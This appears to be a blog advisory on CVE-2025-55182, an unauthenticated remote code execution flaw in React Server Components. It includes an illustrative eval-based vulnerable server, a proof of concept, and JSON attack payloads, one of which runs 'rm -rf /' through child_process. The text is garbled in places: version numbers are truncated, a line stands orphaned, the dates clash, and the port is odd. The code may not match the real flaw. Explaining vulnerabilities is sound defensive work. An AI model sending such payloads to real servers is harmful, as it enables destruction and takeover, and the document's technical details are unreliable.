React Server Components bring a lot of power to web development, but sometimes power comes with risk. In early 2025, a major vulnerability—CVE-2025-55182—was discovered in several versions of React Server Components (v19.. through v19.2.). This bug exposes servers to pre-authentication remote code execution (RCE) via unsafe deserialization of user-supplied data.
Below we break down what happened, which packages are affected, the technical exploit details (including a relevant code sample), and what you—developers and defenders—should do right now.
19.2.
With no authentication required, any attacker on the internet can send specially crafted payloads to endpoints exposed by React Server Functions—potentially running malicious code on your server.
What’s the Vulnerability? Unsafe Deserialization
At the heart of this CVE lies a classic web application mistake: unsafe deserialization. React Server Components accept serialized data from HTTP requests. Older versions of these packages used insecure methods to deserialize incoming payloads, inadvertently allowing attackers to execute arbitrary code.
For example, this pattern might look familiar in the vulnerable codebase
// This function receives serialized requests from clients
function handleServerRequest(req, res) {
// UNSAFE: Directly using eval/deserialization without strict controls
const payload = req.body; // e.g., JSON or custom serialized string
const fn = deserializeFunction(payload.functionCode); // Vulnerable usage
fn(payload.data); // Attacker can control 'fn'
res.send('Done');
}
If deserializeFunction() is not safe (for example, if it relies on eval or Function() under the hood), then whatever code is in payload.functionCode will be executed as if the server wrote it. Exploiting this is as simple as POSTing a malicious request to the endpoint.
Real-World Exploit Scenario
Suppose an attacker wants to run the following command on your server: rm -rf /. Here’s how they might exploit the flawed endpoint above:
Malicious HTTP Request
POST /react-server-endpoint
Content-Type: application/json
{
"functionCode": "require('child_process').execSync('rm -rf /')",
"data": ""
}
If your endpoint deserializes and calls that function (as above), you’ve just granted complete shell access—no logins, no secrets.
Below is a simplified Node.js proof-of-concept showing just how dangerous this is
// DEMO ONLY! -- DO NOT USE THIS
const http = require('http');
function deserializeFunction(code) {
// Vulnerable! Allows code injection
return eval((${code}));
}
http.createServer((req, res) => {
let body = '';
req.on('data', chunk => body += chunk);
req.on('end', () => {
try {
const payload = JSON.parse(body);
const fn = deserializeFunction(payload.functionCode);
fn(payload.data); // Will run arbitrary code
res.end('ok');
} catch (e) {
res.end('error');
}
});
}).listen(300);
Attack payload
{
"functionCode": "() => { require('child_process').execSync('touch HACKED'); }",
"data": null
}
Result: A file named HACKED appears in your server, proof you’ve been owned.
Original References
- Official CVE Details (NVD)
- React Server Components Documentation
- react-server-dom-webpack GitHub Repo
Upgrade immediately to fixed versions (19.2.1+) as soon as patches are released.
- Never deserialize code or functions from client input unless using a hardened, vetted method. Avoid using eval or similar dangerous patterns entirely.
Summary
CVE-2025-55182 is a severe, pre-auth remote code execution bug affecting several widely-deployed React Server Component packages. The root cause is unsafe deserialization of user input, enabling attackers to run arbitrary code on your server. Until patched, any exposed server is at high risk.
Timeline
Published on: 12/03/2025 16:15:56 UTC
Last modified on: 12/06/2025 02:00:02 UTC